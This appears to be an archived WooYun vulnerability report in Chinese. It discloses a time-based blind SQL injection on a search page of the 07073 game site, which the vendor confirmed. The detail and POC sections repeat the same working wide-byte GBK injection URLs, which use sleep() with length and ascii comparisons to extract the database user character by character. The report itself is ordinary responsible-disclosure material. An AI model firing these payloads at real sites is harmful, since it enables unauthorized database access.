破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

07073游戏网某处SQL盲注一枚

编号97990
Urlhttp://www.wooyun.org/bug.php?action=view&id=97990
漏洞状态厂商已经确认
漏洞标题07073游戏网某处SQL盲注一枚
漏洞类型SQL注射漏洞
厂商07073.com
白帽子er0tic
提交日期2015-02-23 16:20:00
公开日期2015-04-13 16:58:00
修复时间(not set)
确认时间2015-02-23 00:00:00
Confirm Spend0
漏洞标签Mysql 注射技巧
关注数0
收藏数0
白帽评级
白帽自评rank9
厂商评级
厂商评rank20
漏洞简介
延时盲注 蛋疼死我了
漏洞细节

URL:

http://zhao.07073.com/searchList?gname=test


1.jpg


看了下是GBK编码 就果断插了下宽字节

%c0


2.jpg


报错了 ,此处限制了输入长度 还过滤了各种敏感关键词 我也非大牛各种绕不过
试了下 http://zhao.07073.com/searchList?gname=s%c0' or 1=sleep(5)#
延时响应了 502错误。

http://zhao.07073.com/searchList?gname=s%c0' or 1=sleep(length(user())=16) #


http://zhao.07073.com/searchList?gname=s%c0' or 1=sleep(ascii(mid(user()))=97) #


延时 说明user的第一个字符为a

http://zhao.07073.com/searchList?gname=s%c0' or 1=sleep(ascii(mid(user()))=100) #


第二个字符为d
....
最后得出:
user:

[email protected]


POC

URL:

http://zhao.07073.com/searchList?gname=test


1.jpg


看了下是GBK编码 就果断插了下宽字节

%c0


2.jpg


报错了 ,此处限制了输入长度 还过滤了各种敏感关键词 我也非大牛各种绕不过
试了下 http://zhao.07073.com/searchList?gname=s%c0' or 1=sleep(5)#
延时响应了 502错误。

http://zhao.07073.com/searchList?gname=s%c0' or 1=sleep(length(user())=16) #


http://zhao.07073.com/searchList?gname=s%c0' or 1=sleep(ascii(mid(user()))=97) #


延时 说明user的第一个字符为a

http://zhao.07073.com/searchList?gname=s%c0' or 1=sleep(ascii(mid(user()))=100) #


第二个字符为d
....
最后得出:
user:

[email protected]

修复方案

。。。

状态信息 2015-02-23: 细节已通知厂商并且等待厂商处理中
2015-02-23: 厂商已经确认,细节仅向厂商公开
2015-03-05: 细节向核心白帽子及相关领域专家公开
2015-03-15: 细节向普通白帽子公开
2015-03-25: 细节向实习白帽子公开
2015-04-13: 细节向公众公开
厂商回复新年快乐!感谢er0tic提供漏洞信息。
回应信息危害等级:高漏洞Rank:20 确认时间:2015-02-23 18:38
Showing 1-4 of 4 items.
评论内容评论人点赞数评论时间

@BMa 是这么个道理。

er0tic02015-03-16 09:23:00

@er0tic 也就是拿到了20rank咯

BMa02015-03-16 09:19:00

@BMa 嗯 是的 厂商还送了小礼物。

er0tic02015-03-16 09:13:00

@er0tic 大厂商?

BMa02015-03-16 09:01:00